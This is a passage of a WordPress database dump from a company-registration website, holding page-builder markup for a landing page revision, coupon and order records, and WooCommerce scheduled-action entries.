url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 15:19:18','2019-08-08 13:19:18','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32428,1,'2019-08-08 15:22:18','0000-00-00 00:00:00','','','','draft','closed','closed','','','','','2019-08-08 15:22:18','2019-08-08 13:22:18','',0,'https://companyregistration.online/?post_type=shop_coupon&#038;p=32428',0,'shop_coupon','',0),(32429,3,'2019-08-08 15:23:04','2019-08-08 13:23:04','[et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||0px|||\" custom_padding=\"10px|5px|51px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"11px||6px||false|false\" custom_padding=\"0px||0px||false|false\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"6px||6px||false|false\" custom_padding=\"0px||0px||false|false\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"6px||6px||false|false\" custom_padding=\"0px||0px||false|false\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.6\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 15:23:04','2019-08-08 13:23:04','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32427,1,'2019-08-08 15:23:46','2019-08-08 13:23:46','','imodis','Discount test 189','publish','closed','closed','','imodis','','','2019-08-08 15:23:46','2019-08-08 13:23:46','',0,'https://companyregistration.online/?post_type=shop_coupon&#038;p=32427',0,'shop_coupon','',0),(32431,0,'2019-08-08 13:25:00','2019-08-08 13:25:00','{\"webhook_id\":5,\"arg\":1}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d4c22c6467822.83940997-ayt7OKUXR8hPqzIFZCzqKB6363bkzZke','','','2019-08-08 15:25:26','2019-08-08 13:25:26','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32431',0,'scheduled-action','',3),(32432,1,'2019-08-08 15:25:00','2019-08-08 13:25:00','','Order &ndash; August 8, 2019 @ 03:25 PM','','wc-completed','open','closed','wc_order_e1vcCuOdKP0Dy','order-aug-08-2019-0125-pm','','','2019-08-08 15:28:46','2019-08-08 13:28:46','',0,'https://companyregistration.online/?post_type=shop_order&#038;p=32432',0,'shop_order','',2),(32433,0,'2019-08-08 13:25:05','2019-08-08 13:25:05','[32432]','wc-admin_import_order','','publish','open','closed','','scheduled-action-5d4c22c69bb4b1.26259790-XgbL6jckRAJKY9hpzXdajEI9HHVrTmeQ','','','2019-08-08 15:25:26','2019-08-08 13:25:26','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32433',30,'scheduled-action','',3),(32434,0,'2019-08-08 13:25:01','2019-08-08 13:25:01','{\"webhook_id\":3,\"arg\":32432}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d4c22c6878369.63564229-elwzLWomU8NH1ZX5FuODSwg6KPUnewAh','','','2019-08-08 15:25:26','2019-08-08 13:25:26','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32434',0,'scheduled-action','',3),(32435,0,'2019-08-08 13:28:51','2019-08-08 13:28:51','[32432]','wc-admin_import_order','','publish','open','closed','','scheduled-action-5d4c23b78dd397.69041390-Jo7MGTzgwMfDFys35HwEfFZX2N0Y8wYL','','','2019-08-08 15:29:27','2019-08-08 13:29:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32435',30,'scheduled-action','',3),(32436,0,'2019-08-08 13:28:46','2019-08-08 13:28:46','{\"webhook_id\":2,\"arg\":32432}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d4c23b73b8d43.37504436-EPppW1qsF5ULXkQKrFxzoqaLoYLCy444','','','2019-08-08 15:29:27','2019-08-08 13:29:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32436',0,'scheduled-action','',3),(32437,0,'2019-08-08 13:28:46','2019-08-08 13:28:46','{\"webhook_id\":5,\"arg\":1}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d4c23b7754b20.72518416-pGaKvzzz72aXRHIDOXbXyCxqqCeXJn8e','','','2019-08-08 15:29:27','2019-08-08 13:29:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32437',0,'scheduled-action','',3),(32439,1,'2019-08-08 15:35:30','2019-08-08 13:35:30','{\n    \"et_divi[heading_font]\": {\n        \"value\": \"Lato\",\n        \"type\": \"option\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2019-08-08 13:35:30\"\n    }\n}','','','trash','closed','closed','','108f1399-d9b8-40a2-b204-cfc1dd72836e','','','2019-08-08 15:35:30','2019-08-08 13:35:30','',0,'https://companyregistration.online/108f1399-d9b8-40a2-b204-cfc1dd72836e/',0,'customize_changeset','',0),(32440,0,'2019-08-08 14:41:46','2019-08-08 14:41:46','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4c3593ba1f84.55820743-LzPh0Aez9Ck5YMwCGvuuyh0iRw8k6Cp0','','','2019-08-08 16:45:39','2019-08-08 14:45:39','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32440',0,'scheduled-action','',3),(32441,0,'2019-08-08 14:41:47','2019-08-08 14:41:47','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d4c3593cb8bf8.49977897-eAJOCpESQda4ZJuOaab5v1BA3sAOJt0a','','','2019-08-08 16:45:39','2019-08-08 14:45:39','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32441',0,'scheduled-action','',3),(32442,3,'2019-08-08 15:48:10','2019-08-08 13:48:10','','app-03','','inherit','open','closed','','app-03','','','2019-08-08 15:48:10','2019-08-08 13:48:10','',0,'https://companyregistration.online/wp-content/uploads/2019/08/app-03.png',0,'attachment','image/png',0),(32443,3,'2019-08-08 15:48:14','2019-08-08 13:48:14','','app-04','','inherit','open','closed','','app-04','','','2019-08-08 15:48:14','2019-08-08 13:48:14','',0,'https://companyregistration.online/wp-content/uploads/2019/08/app-04.png',0,'attachment','image/png',0),(32444,3,'2019-08-08 